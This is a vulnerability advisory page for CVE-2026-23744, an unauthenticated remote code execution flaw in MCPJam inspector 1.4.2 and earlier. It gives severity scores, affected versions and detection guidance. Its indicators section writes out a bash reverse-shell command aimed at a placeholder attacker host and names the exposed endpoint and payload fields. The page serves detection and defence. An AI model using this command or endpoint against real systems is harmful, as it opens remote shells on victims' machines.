cbcvebase.
CVE-2026-23744
published 2026-01-16

CVE-2026-23744: MCPJam inspector is the local-first development platform for MCP servers. Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE)…

PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
65.84%
99.2th percentile
MCPJam inspector is the local-first development platform for MCP servers. Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. Since MCPJam inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request. Version 1.4.3 contains a patch.

Affected

3 ranges
VendorProductVersion rangeFixed in
mcpjaminspector< 1.4.31.4.3
mcpjaminspector<= 1.4.2
mcpjaminspector>= 0 < 1.4.31.4.3

Detection & IOCsextracted from sources · hover to see the quote

url/api/mcp/connect
commandPOST /api/mcp/connect HTTP/1.1
command/bin/bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1
  • Monitor for inbound HTTP POST requests to the /api/mcp/connect endpoint from non-loopback addresses. The service listens on 0.0.0.0 by default, making it reachable remotely without authentication.
  • Alert on HTTP 500 responses from /api/mcp/connect containing both the strings 'Connection failed for server' and 'MCP error' in the JSON body — this is the observable server-side error produced during exploitation.
  • Inspect the JSON payload of POST requests to /api/mcp/connect for attacker-controlled 'command' and 'args' fields (e.g., 'curl', 'bash', '/dev/tcp/…') within the serverConfig object, which are passed directly to command execution.
  • Look for child processes spawned by the MCPJam Inspector process that include reverse-shell patterns such as /dev/tcp/ connections or bash -i invocations, indicating successful RCE.
  • ·MCPJam Inspector binds to 0.0.0.0 by default instead of 127.0.0.1, exposing the vulnerable /api/mcp/connect endpoint to all network interfaces and making remote exploitation trivial without any additional network access requirements.
  • ·The vulnerability requires no authentication (CWE-306), meaning any host with network access to the service can exploit it without credentials.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ghsa9.4CRITICAL
osv9.4CRITICAL
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.